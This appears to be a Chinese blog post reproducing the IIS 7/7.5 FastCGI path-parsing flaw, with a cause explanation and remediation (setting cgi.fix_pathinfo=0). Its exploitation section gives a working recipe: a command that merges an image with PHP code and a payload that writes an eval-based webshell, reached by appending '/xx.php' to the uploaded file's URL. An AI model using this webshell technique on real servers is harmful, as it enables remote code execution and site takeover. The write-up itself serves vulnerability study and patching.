七夕咱一起验证漏洞✨ IIS7/7.5对文件名畸形解析导致远程代码执行❤️

最新推荐文章于 2023-10-12 16:29:36 发布
最新推荐文章于 2023-10-12 16:29:36 发布
阅读量5k 收藏 34
点赞数 42
分类专栏: Penetration Testing 漏洞验证及复现 文章标签: 漏洞验证
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44309905/article/details/119640254
版权

IIS7/7.5对文件名畸形解析

在这里插入图片描述

1️⃣漏洞复现

http://www.xxx.cn/statics/ghx/css/default1219.css/xx.php

在这里插入图片描述
IIS 7/7.5在Fast-CGI运行模式下,如果在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。

2️⃣利用方法

将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾

e.g. copy xx.jpg/b + yy.txt/a xy.jpg

  • /b 即二进制[binary]模式

  • /a 即ascii模式 xx.jpg正常图片文件

yy.txt 内容

 <?PHPfputs(fopen('shell.php','w'),'<?php eval($_POST[IIS])?>');?>

意思为写入一个内容为 <?php eval($_POST[IIS])?> 名称为shell.php的文件

找个地方上传 xy.jpg ,然后找到 xy.jpg 的地址,在地址后加上 /xx.php 即可执行恶意文本。

然后就在图片目录下生成一句话木马 shell.php 密码 IIS

3️⃣详细描述

Microsoft Internet信息服务(IIS)是Microsoft Windows自带的一个网络信息服务器。

IIS7/7.5当以CGI的方式运行PHP时,在处理PHP文件路径的解析时存在问题。如果网站允许上传文件,而且上传文件路径可得到,远程攻击者可以利用此漏洞上传包含恶意代码的文件并得到执行,实现以Web进程权限执行任意命令。

攻击者上传允许上传的文件类型,文件中包含恶意代码,得到上传文件的URL后,在其后添加任意php后缀的文件名进行访问,会把上传的文件作为CGI脚本执行。

4️⃣解决办法

增强IIS设置。在IIS里找到“处理程序映射”,然后对PHP这一项进行编辑,将映射调整为仅限文件。或则在php.ini中修改为cgi.fix_pathinfo = 0 。

在这里插入图片描述

李白你好
关注
  • 42
    点赞
  • 34
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 69
    评论
专栏目录
七夕情侣飞行棋游戏限定版本源码/解锁版
03-05
七夕情侣飞行棋限定版本源码已经发布!这是一款专为情侣打造的桌游,让您与您的另一半一起感受浪漫的体验。 更为重要的是,这个版本已经移除了路由器限制,解锁了全部功能,而且没有任何加密措施,您只需将源码上传至服务器即可畅玩。 密码都是:111111
Web中间件漏洞复现合集---IIS
ierciyuan的博客
11-05 4688
复现IIS常见的一些漏洞,包括PUT漏洞、短文件名猜解、远端代码执行(cve-2017-7269/ms-15-034)、解析漏洞等。提供IIS6.0.exe、iiswrite等工具。
网络安全——Web容器及IIS
weixin_54055099的博客
09-22 1627
文件解析漏洞IIS6.0和IIS7.5解析漏洞
iis常见漏洞(中间件常见漏洞
qq_56438857的博客
08-17 8612
漏洞的意义:1、 猜解后台地址2、 猜解敏感文件,例如备份的rar、zip、.bak、.sql文件等。3、 在某些情形下,甚至可以通过短文件名web直接下载对应的文件。该漏洞的局限性:1、 只能猜解前六位,以及扩展名的前三位。2、 名称较短的文件是没有相应的短文件名的。3、 不支持中文文件名4、 如果文件名前6位带空格,8.3格式的短文件名会补进,和真实文件名不匹配5、 需要IIS和.net两个条件都满足。...
文件上传&解析漏洞
weixin_44926231的博客
08-13 1397
一、IIS 5.x/6.0解析漏洞(03) IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 在网站下简历文件夹为.asp、.asa的文件夹,其目录内的任何文件扩展名的文件都会被IIS当做asp文件执行 例如目录 hahaha.asp,那么/hahaha.asp/1.jpg 一个jpg格式的文件就会被当做asp脚本文件解析执行,假设黑客可以控制问上传文件文件夹路径...
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞IIS高版本漏洞及防御
qq_50854662的博客
11-08 4359
fckeditor漏洞_三十,文件上传漏洞、编辑器漏洞IIS高版本漏洞及防御
Web流程-IIS执行原理(详细)
微微的猪食小窝
10-30 730
IIS Web服务器 若要运行 ASP.NET Web 应用程序,需要一台 Web 服务器。用于 Microsoft 操作系统的成品 Web 服务器是 IIS,它包括 Web 服务器、文件传输协议 (FTP) 服务器、简单邮件传输协议 (SMTP) 虚拟电子邮件服务器以及其他设备。 进程 进程(Process)是计算机中的程序关于某数据集合上的一次运行活动,是系统进行资源分配和调度的基本单位,是操作系统结构的基础;
IIS7.5文件解析漏洞&&Apache解析漏洞&&Nginx文件解析漏洞&&
m0_73720136的博客
05-07 2186
掌握利用IIS7.5文件解析漏洞,绕过白名单限制,解析脚本文件。掌握利用Apache文件解析漏洞,绕过白名单限制,解析脚本文件。掌握利用Nginx文件解析漏洞,绕过白名单限制,解析脚本文件
iis7 php漏洞,通杀IIS7.0畸形解析0day漏洞
weixin_39770226的博客
03-24 258
先合并一张PHP一句话图片马,合并方法:①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif②、用edjpgcom,进行图片和一句话木马的合并,图片随便找一张.【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】一句话:...
520,七夕节,爱情表白代码
05-19
明天就是5月20号了,很多人都准备向心怡的女孩子表白了,但是没有好的想法,送你一段代码,助你一臂之力!
IIS_6.0文件解析漏洞及解决办法
04-07
IIS_6.0文件解析漏洞及解决办法IIS_6.0文件解析漏洞及解决办法IIS_6.0文件解析漏洞及解决办法
七夕节微信表白墙小程序源码/基于Laravel的表白墙微信小程序源码
04-20
微信表白墙小程源码,表白墙最大的特色就是地域性,圈子性比较强,在地方县城里这种级别就比较合适,在大学里更是如鱼得水。 功能主要分为:表白墙、卖舍友、步数旅行、情侣脸、我的,大致功能都在图上了。...
七套表白源码.zip_69表白代码_html 表白_七夕表白js_表白 js_表白dat
07-15
表白源码 七夕表白源码 html js表白源码
七夕表白网页源代码合集
09-19
马上就快要到七夕了,珍藏了很久的表白网页源代码,华丽的网页效果加上动听的音乐,我相信你的他(她)一定会被你感动的。
iis7.5解析漏洞(iis7.5 解析漏洞解决方案)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
04-13 5656
iis7.5解析漏洞解决方案,第1种方案:继续使用FastCGI方式调用PHP,要解决这个安全问题可以在php.ini里设置 cgi.fix_pathinfo=0 ,修改保存后建议重启iis(注意可能影响到某些应用程序功能)。 第2种方案:使用ISAPI的方式调用PHP。(注意:PHP5.3.10已经摒弃了 ISAPI 方式) 第3种方案:可以使用其他web服务器软件,如apache等。 【实战解决方案】增强IIS设置(IIS7站长之家 测试通过) 在IIS里找到“处理程序映射”,然后对PHP这
中间件漏洞详解
10-26
本课程分别从iis5.x/6、iis7、apache三个中间件漏洞进行分析,首先从原理上介绍形成该漏洞的原因,而后通过实战的形式演示怎么利用这三种漏洞对服务器进行攻击。
IIS 解析漏洞复现
最新发布
来日可期的博客
10-12 2647
IIS 7.0/7.5 解析漏洞,在路径的末尾添加一个/.php,页面报错的原因是这里使用的是IIS10.0 该漏洞已被修复。php解释执行是通过php解释器来决定的,这里我们使用phpstudy中的php-cgi.exe。当用户访问phpinfo.php的时候,将该文件找到交给php-cgi.exe来解释执行。修改php.ini文件中的cgi.fix.pathinfo的值为0。将phpinfo.php后缀名修改为png,重新访问页面。在指定目录下创建一个phpinfo.php文件
中间件之IIS7.5漏洞复现
奕家
07-02 5205
1)系统win10专业版 2)PHPstudy版本2016 ''' IIS7.5漏洞是由于php配置文件中,开启了cgi.fix_pathinfo,而这并不是iis7.5本身的漏洞。 当安装完成后, php.ini里默认cgi.fix_pathinfo=1,对其进行访问的时候,在URL路径后添加.php后缀名会当做php文件进行解析漏洞由此产生 注:在进行实际的测试的时候,发现漏洞并没有产生,后来发现要设置FastCGI为关闭,该项好像是用来处理数据文件 ''' ...
iis7.5文件解析漏洞
box
02-05 6078
文件解析漏洞总结 0x00 常见的文件解析漏洞 文件上传漏洞通常与Web容器的解析漏洞配合利用 常见Web容器有IIS、Nginx、Apache、Tomcat等 0x01 IIS 7.0/IIS 7.5/Nginx <=0.8.37 解析漏洞 在默认Fast-CGI开启状况下,在一个文件路径(/xx.jpg)后面加上/xx.PHP会将 /xx.jpg/xx.php 解析为 php 文件。 开启CGI 添加模块映射 修改php.ini文件 cgi.fix_pathinfo=0 修改为 cgi
七夕节表白代码python
08-23
以下是一个用Python编写的七夕节表白代码: ``` # -*- coding:utf-8 -*- def confession(): print("亲爱的,我想对你说:") print("在这个七夕节,我想告诉你我对你的心意。") print("我喜欢你的笑容,喜欢你温柔的眼神。") print("你是我生命中最重要的人,没有你我将无法呼吸。") print("你愿意成为我的女朋友吗?") print("请输入“yes”或“no”。") answer = input() if answer == "yes": print("太好了!我会一直守护你,爱你一辈子!") else: print("没关系,我会一直保持对你的爱和祝福。") confession() ``` 这段代码会输出一段表白的文字,然后等待用户输入回答。如果用户输入"yes",则会输出肯定的回答;如果用户输入其他任何答案,都会输出否定的回答。这段代码可以通过运行Python解释器来执行,让你的亲密爱人体验到程序员的浪漫!<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [程序员的七夕用30行代码让Python化身表白神器](https://download.csdn.net/download/weixin_38733382/12860807)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [赶紧收藏:如何用Python过一个完美的七夕节??](https://blog.csdn.net/weixin_55822277/article/details/119697681)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 69
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

李白你好

年轻人,少吐槽,多搬砖

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值